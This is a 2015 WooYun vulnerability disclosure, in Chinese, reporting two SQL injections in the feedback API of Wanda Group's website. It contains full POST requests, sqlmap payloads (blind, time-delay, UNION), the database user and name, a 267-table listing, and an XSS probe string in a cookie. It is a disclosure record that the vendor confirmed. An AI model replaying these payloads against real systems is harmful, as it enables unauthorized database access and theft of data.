乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-06: 细节已通知厂商并且等待厂商处理中 2015-08-06: 厂商已经确认,细节仅向厂商公开 2015-08-16: 细节向核心白帽子及相关领域专家公开 2015-08-26: 细节向普通白帽子公开 2015-09-05: 细节向实习白帽子公开 2015-09-20: 细节向公众公开
大连万达集团股份有限公司官方网站两枚POST型SQL注入打包
包1:
POST /api.php?op=feedback HTTP/1.1Content-Length: 93Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.wanda.cn/Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730Host: www.wanda.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*City=1169&DictionaryID=LY&type=GetProJectList
包2:
POST /api.php?op=feedback HTTP/1.1Content-Length: 68Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.wanda.cn/Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730Host: www.wanda.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Province=fWqPza1t&type=getCity
1.
2.
截图太麻烦我直接上日志1.
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:---Parameter: DictionaryID (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList---web application technology: Nginx, PHP 5.3.25back-end DBMS: Microsoft SQL Server 2008current user: 'ksfw_user'sqlmap resumed the following injection point(s) from stored session:---Parameter: DictionaryID (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList---web application technology: Nginx, PHP 5.3.25back-end DBMS: Microsoft SQL Server 2008current database: 'ksfw'sqlmap resumed the following injection point(s) from stored session:---Parameter: DictionaryID (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList---web application technology: Nginx, PHP 5.3.25back-end DBMS: Microsoft SQL Server 2008Database: ksfw[267 tables]+---------------------------------+| AL_ADD_APPLY || AL_AUDIT_LOG || AL_CATE || AL_CONTENT || AL_CONTENT_CATE || AL_CONT_DETAIL || AU_ACCREDIT_DATA || AU_ACCREDIT_FUNC || AU_ACCREDIT_MENU || CONT_HANDEL_LOG || CUS_ASSIGN_LOG || CUS_BL || CUS_BLACKLIST || CUS_BL_APPLY || CUS_BL_CONTACT || CUS_BL_INTERVAL || CUS_BL_LOG || CUS_BL_PHONE || CUS_CONTACT || CUS_CONT_INFO || CUS_CONT_TYPE || CUS_DOM || CUS_HOBBY || CUS_INFO || CUS_OR_CONTACT || CUS_QU_CONTACT || CUS_RECOMMEND || CUS_SPEC_EVENT || ComplaintPlazaView || EHR_EMPLOYEE_ORG_REL_TEMP || EHR_EMPLOYEE_POS_REL_TEMP || EHR_EMPLOYEE_TEMP || EHR_ORGNIZATION_TEMP || EHR_POSITION_TEMP || EMPLOYEE_ORG_REL || FAC_TS_ATTR_DETAIL || FAC_TS_ATTR_DETAIL_POEP || FAC_TS_CONT_DETAIL || FAC_TS_DEAL_TIME_DETAIL || FAC_TS_KM_COUNT_DAY || FAC_TS_OPER_DETAIL || FAC_TS_QD_COUNT_DAY || FAC_TS_YJ_DETAIL || FAC_TS_ZDY_ATTR_DETAIL || FAC_ZJ_CONTACT_HZ_VIEW || FAC_ZJ_CONTACT_INFO_VIEW || HW_CTICONFIG || HW_DUTYMANAGE || HW_DUTY_EMP || HW_SEATACCREDIT || HW_SKILLGROUP || HW_SKILLSEAT || HW_SKILL_SEAT || IMS_BASIC_REPLY || IM_NEWS || IM_NEWS_REAL_RECEIVER || IM_NEWS_RECEIVER || IVR_CITY_YETAI || IVR_MOBILE_TELEPHONE_MAPPING || IVR_OFFLINE_TO_MOBILE || IVR_TELEPHONE_AREA_MAPPING || IVR_VIP_EMP || JBPM4_DEPLOYMENT || JBPM4_DEPLOYPROP || JBPM4_EXECUTION || JBPM4_HIST_ACTINST || JBPM4_HIST_DETAIL || JBPM4_HIST_PROCINST || JBPM4_HIST_TASK || JBPM4_HIST_VAR || JBPM4_ID_GROUP || JBPM4_ID_MEMBERSHIP || JBPM4_ID_USER || JBPM4_JOB || JBPM4_LOB || JBPM4_PARTICIPATION || JBPM4_PROPERTY || JBPM4_SWIMLANE || JBPM4_TASK || JBPM4_VARIABLE || KM_BASEINFO || KM_CATE || KM_EVAL || KM_INFO_REL || KN_SUBJECT_CATE || KN_SUBJECT_ITEM || KN_SURVEY || KN_SURVEY_ANSWER || KN_SURVEY_R_SUBJECT || KN_SURVEY_SUBJECT || OAMQMessages || OB_ACTIV_BASE || OB_ACTIV_OPELOG || OB_ACTIV_RULE || OB_ASSIGN_ROLE || OB_ASSIGN_SET || OB_CONTACT_ITEM || OB_CONTACT_SET || OB_CUS_ATTRI || OB_CUS_TEMPL || OB_PERMIT_TIME || OB_PROJ_BASE || OB_PROJ_OPELOG || OB_STAGE_BASE || OB_STAGE_ITEM || ONLINE_CONTACT || ONLINE_CONTACT_READ_LOG || ONLINE_CONTACT_RECEIVER || OP_CT_COLLECT || OP_CT_NOTICE || OP_CT_NOTICE_READ_LOG || OP_CT_NOTICE_RECEIVER || ORGNIZATION || QD_WHITE_LIST || REC_SYN_SMS || REL_SPLIT_TYPE || RP_CMS_SKILL_HOUR || SHEET || SHEET_BACK || SHEET_CONSULT || SHEET_REMINDER || SHEET_REPAIRS || SHEET_TS || SHEET_VOID || SYS_ATTACHMENT || SYS_BP_ITEM || SYS_BP_TYPE || SYS_CONTACT_ADDR || SYS_DEPARTMENT || SYS_DIC || SYS_DIC_ITEM || SYS_EMP || SYS_EMPLOYEE || SYS_GROUP || SYS_HANDLE_LOG || SYS_HOLIDAY || SYS_LOG_OPERATE || SYS_MENU || SYS_MENU_NAV || SYS_OPRITION_LOG || SYS_ORG_ROLE || SYS_PASSWORD_POLICY || SYS_REGION || SYS_RESOURCE || SYS_ROLE || SYS_ROLE_CATE || SYS_ROLE_EMP || SYS_ROLE_GROUP || SYS_ROLE_MENU || SYS_ROLE_PARAM || SYS_ROLE_USER || SYS_SP_ITEM || SYS_SP_TYPE || SYS_TENEMENT || SYS_TENEMENT_DOC || SYS_USER || SYS_USER_GROUP || SYS_USER_LOGIN_LOG || SYS_WORKTIME || TOOL_NOTE || TSM_Messages || Temp_Organizations || WC_ACCOUNT || WC_FANS || WC_FANS_GROUP || WC_ISSUE || WC_MATERIAL_API || WC_MATERIAL_PICTURE || WC_MATERIAL_VOICE || WC_MEMBER || WC_MEMBER_GROUP || WC_MENU || WC_MSG_SEND || WC_REPLY_RULE || WC_REPLY_TEXT || WC_REPLY_VIDEO || WC_RULE_KEYWORD || WC_RULE_REPLY || WC_USER_BINDING || WD_MASS_HANDLE || WD_MASS_INCIDENT || WD_MASS_TASK || WD_ORDERHANDLE || WD_SG || WD_TS_SHEET || WD_WEBORDER || WD_YQJK || WFE_APPROVE_LOG || WFE_BEFORE_LOG || WFE_HANDLE_APPLY || WFE_REMINDER_LOG || WFE_SHEET || WFE_SHIFT_LOG || WFE_TODO || WFE_TODO_ASSIGNMENT || WFE_UPGRADE_LOG || WFE_URGE || WF_AR_NOTICE_LOG || WF_AR_NOTICE_LOG_20150420before || WF_AR_NOTICE_LOG_CURR_temp || WF_AR_NOTICE_LOG_temp || WF_AR_RE_LOG || WF_Add_DATA || WF_FLOW_CATE || WF_FLOW_INFO || WF_FLOW_VARIABLE || WF_NODE || WF_NODE_ALERT || WF_NODE_ALTER_REG || WF_NODE_CONDITION || WF_NODE_EXEC_REG || WF_NODE_NOTICE || WF_NODE_ROLE || WF_NODE_TIME || WF_SHEEP_ASSOCIATED || WF_SHEET_ASSOCIATED || WSQ_BUILDING || WSQ_COMMUNITY || WSQ_FAN_CUS || WSQ_ROOM || WSQ_UNIT || Wanda_RT_CONTRACT || ZJ_BATCH_BASE || ZJ_BATCH_CONTACT || ZJ_BATCH_DF || ZJ_BATCH_RULE || ZJ_BATCH_SF || ZJ_BATCH_SHEET || ZJ_CONT_ITEM || ZJ_CONT_ITEM_KPI || ZJ_CONT_ITEM_KPI_PUBLISH || ZJ_CONT_ITEM_PUBLISH || ZJ_EVAL_BASE || ZJ_EVAL_CHECK || ZJ_EVAL_ITEM || ZJ_EVAL_S_BASE || ZJ_EVAL_S_RULE || ZJ_EXAMRULE_CONT || ZJ_EXAM_RULE || ZJ_PROJ_BASE || ZJ_PROJ_ROLE || ZJ_REF || ZJ_REF_CONT || ZJ_REF_DEPT || ZJ_REVIEW || ZJ_TEMPL || ZJ_TEMPL_BASE || ZJ_TEMPL_ITEM || ZJ_TEMPL_ITEM_KPI || ZJ_TEMPL_KPI || ZJ_TEMPL_PUBLISH || ZJ_TEMP_CONT || ZJ_TEMP_CONT_PUBLISH || ZJ_THRES || ZJ_THRES_BASE || ZJ_THRES_RULE || ZJ_ZJDF_JZITEM_LOG || ZJ_ZJRW || ZJ_ZJRW_ASSIGN_LOG || ZJ_ZJRW_ROLE || ZJ_test1 || rec_syn_cms || unEmpForRole || unEmpInfoForRole || wsq_commu_cus || wsq_zutuan || 查询 |+---------------------------------+
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:---Parameter: Province (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity---web application technology: Nginx, PHP 5.3.25back-end DBMS: Microsoft SQL Server 2008current user: 'ksfw_user'sqlmap resumed the following injection point(s) from stored session:---Parameter: Province (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity---web application technology: Nginx, PHP 5.3.25back-end DBMS: Microsoft SQL Server 2008current database: 'ksfw'sqlmap resumed the following injection point(s) from stored session:---Parameter: Province (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity---web application technology: Nginx, PHP 5.3.25back-end DBMS: Microsoft SQL Server 2008Database: ksfw[267 tables]+---------------------------------+| AL_ADD_APPLY || AL_AUDIT_LOG || AL_CATE || AL_CONTENT || AL_CONTENT_CATE || AL_CONT_DETAIL || AU_ACCREDIT_DATA || AU_ACCREDIT_FUNC || AU_ACCREDIT_MENU || CONT_HANDEL_LOG || CUS_ASSIGN_LOG || CUS_BL || CUS_BLACKLIST || CUS_BL_APPLY || CUS_BL_CONTACT || CUS_BL_INTERVAL || CUS_BL_LOG || CUS_BL_PHONE || CUS_CONTACT || CUS_CONT_INFO || CUS_CONT_TYPE || CUS_DOM || CUS_HOBBY || CUS_INFO || CUS_OR_CONTACT || CUS_QU_CONTACT || CUS_RECOMMEND || CUS_SPEC_EVENT || ComplaintPlazaView || EHR_EMPLOYEE_ORG_REL_TEMP || EHR_EMPLOYEE_POS_REL_TEMP || EHR_EMPLOYEE_TEMP || EHR_ORGNIZATION_TEMP || EHR_POSITION_TEMP || EMPLOYEE_ORG_REL || FAC_TS_ATTR_DETAIL || FAC_TS_ATTR_DETAIL_POEP || FAC_TS_CONT_DETAIL || FAC_TS_DEAL_TIME_DETAIL || FAC_TS_KM_COUNT_DAY || FAC_TS_OPER_DETAIL || FAC_TS_QD_COUNT_DAY || FAC_TS_YJ_DETAIL || FAC_TS_ZDY_ATTR_DETAIL || FAC_ZJ_CONTACT_HZ_VIEW || FAC_ZJ_CONTACT_INFO_VIEW || HW_CTICONFIG || HW_DUTYMANAGE || HW_DUTY_EMP || HW_SEATACCREDIT || HW_SKILLGROUP || HW_SKILLSEAT || HW_SKILL_SEAT || IMS_BASIC_REPLY || IM_NEWS || IM_NEWS_REAL_RECEIVER || IM_NEWS_RECEIVER || IVR_CITY_YETAI || IVR_MOBILE_TELEPHONE_MAPPING || IVR_OFFLINE_TO_MOBILE || IVR_TELEPHONE_AREA_MAPPING || IVR_VIP_EMP || JBPM4_DEPLOYMENT || JBPM4_DEPLOYPROP || JBPM4_EXECUTION || JBPM4_HIST_ACTINST || JBPM4_HIST_DETAIL || JBPM4_HIST_PROCINST || JBPM4_HIST_TASK || JBPM4_HIST_VAR || JBPM4_ID_GROUP || JBPM4_ID_MEMBERSHIP || JBPM4_ID_USER || JBPM4_JOB || JBPM4_LOB || JBPM4_PARTICIPATION || JBPM4_PROPERTY || JBPM4_SWIMLANE || JBPM4_TASK || JBPM4_VARIABLE || KM_BASEINFO || KM_CATE || KM_EVAL || KM_INFO_REL || KN_SUBJECT_CATE || KN_SUBJECT_ITEM || KN_SURVEY || KN_SURVEY_ANSWER || KN_SURVEY_R_SUBJECT || KN_SURVEY_SUBJECT || OAMQMessages || OB_ACTIV_BASE || OB_ACTIV_OPELOG || OB_ACTIV_RULE || OB_ASSIGN_ROLE || OB_ASSIGN_SET || OB_CONTACT_ITEM || OB_CONTACT_SET || OB_CUS_ATTRI || OB_CUS_TEMPL || OB_PERMIT_TIME || OB_PROJ_BASE || OB_PROJ_OPELOG || OB_STAGE_BASE || OB_STAGE_ITEM || ONLINE_CONTACT || ONLINE_CONTACT_READ_LOG || ONLINE_CONTACT_RECEIVER || OP_CT_COLLECT || OP_CT_NOTICE || OP_CT_NOTICE_READ_LOG || OP_CT_NOTICE_RECEIVER || ORGNIZATION || QD_WHITE_LIST || REC_SYN_SMS || REL_SPLIT_TYPE || RP_CMS_SKILL_HOUR || SHEET || SHEET_BACK || SHEET_CONSULT || SHEET_REMINDER || SHEET_REPAIRS || SHEET_TS || SHEET_VOID || SYS_ATTACHMENT || SYS_BP_ITEM || SYS_BP_TYPE || SYS_CONTACT_ADDR || SYS_DEPARTMENT || SYS_DIC || SYS_DIC_ITEM || SYS_EMP || SYS_EMPLOYEE || SYS_GROUP || SYS_HANDLE_LOG || SYS_HOLIDAY || SYS_LOG_OPERATE || SYS_MENU || SYS_MENU_NAV || SYS_OPRITION_LOG || SYS_ORG_ROLE || SYS_PASSWORD_POLICY || SYS_REGION || SYS_RESOURCE || SYS_ROLE || SYS_ROLE_CATE || SYS_ROLE_EMP || SYS_ROLE_GROUP || SYS_ROLE_MENU || SYS_ROLE_PARAM || SYS_ROLE_USER || SYS_SP_ITEM || SYS_SP_TYPE || SYS_TENEMENT || SYS_TENEMENT_DOC || SYS_USER || SYS_USER_GROUP || SYS_USER_LOGIN_LOG || SYS_WORKTIME || TOOL_NOTE || TSM_Messages || Temp_Organizations || WC_ACCOUNT || WC_FANS || WC_FANS_GROUP || WC_ISSUE || WC_MATERIAL_API || WC_MATERIAL_PICTURE || WC_MATERIAL_VOICE || WC_MEMBER || WC_MEMBER_GROUP || WC_MENU || WC_MSG_SEND || WC_REPLY_RULE || WC_REPLY_TEXT || WC_REPLY_VIDEO || WC_RULE_KEYWORD || WC_RULE_REPLY || WC_USER_BINDING || WD_MASS_HANDLE || WD_MASS_INCIDENT || WD_MASS_TASK || WD_ORDERHANDLE || WD_SG || WD_TS_SHEET || WD_WEBORDER || WD_YQJK || WFE_APPROVE_LOG || WFE_BEFORE_LOG || WFE_HANDLE_APPLY || WFE_REMINDER_LOG || WFE_SHEET || WFE_SHIFT_LOG || WFE_TODO || WFE_TODO_ASSIGNMENT || WFE_UPGRADE_LOG || WFE_URGE || WF_AR_NOTICE_LOG || WF_AR_NOTICE_LOG_20150420before || WF_AR_NOTICE_LOG_CURR_temp || WF_AR_NOTICE_LOG_temp || WF_AR_RE_LOG || WF_Add_DATA || WF_FLOW_CATE || WF_FLOW_INFO || WF_FLOW_VARIABLE || WF_NODE || WF_NODE_ALERT || WF_NODE_ALTER_REG || WF_NODE_CONDITION || WF_NODE_EXEC_REG || WF_NODE_NOTICE || WF_NODE_ROLE || WF_NODE_TIME || WF_SHEEP_ASSOCIATED || WF_SHEET_ASSOCIATED || WSQ_BUILDING || WSQ_COMMUNITY || WSQ_FAN_CUS || WSQ_ROOM || WSQ_UNIT || Wanda_RT_CONTRACT || ZJ_BATCH_BASE || ZJ_BATCH_CONTACT || ZJ_BATCH_DF || ZJ_BATCH_RULE || ZJ_BATCH_SF || ZJ_BATCH_SHEET || ZJ_CONT_ITEM || ZJ_CONT_ITEM_KPI || ZJ_CONT_ITEM_KPI_PUBLISH || ZJ_CONT_ITEM_PUBLISH || ZJ_EVAL_BASE || ZJ_EVAL_CHECK || ZJ_EVAL_ITEM || ZJ_EVAL_S_BASE || ZJ_EVAL_S_RULE || ZJ_EXAMRULE_CONT || ZJ_EXAM_RULE || ZJ_PROJ_BASE || ZJ_PROJ_ROLE || ZJ_REF || ZJ_REF_CONT || ZJ_REF_DEPT || ZJ_REVIEW || ZJ_TEMPL || ZJ_TEMPL_BASE || ZJ_TEMPL_ITEM || ZJ_TEMPL_ITEM_KPI || ZJ_TEMPL_KPI || ZJ_TEMPL_PUBLISH || ZJ_TEMP_CONT || ZJ_TEMP_CONT_PUBLISH || ZJ_THRES || ZJ_THRES_BASE || ZJ_THRES_RULE || ZJ_ZJDF_JZITEM_LOG || ZJ_ZJRW || ZJ_ZJRW_ASSIGN_LOG || ZJ_ZJRW_ROLE || ZJ_test1 || rec_syn_cms || unEmpForRole || unEmpInfoForRole || wsq_commu_cus || wsq_zutuan || 查询 |+---------------------------------+
下边的下边就不操作了,日志一目了然。
一个api.php3个注入,我也是醉了。大神在万达,你们比我懂.........
危害等级:高
漏洞Rank:12
确认时间:2015-08-06 16:47
感谢百度流氓同学的持续关注与贡献!马上通知业务整改!
暂无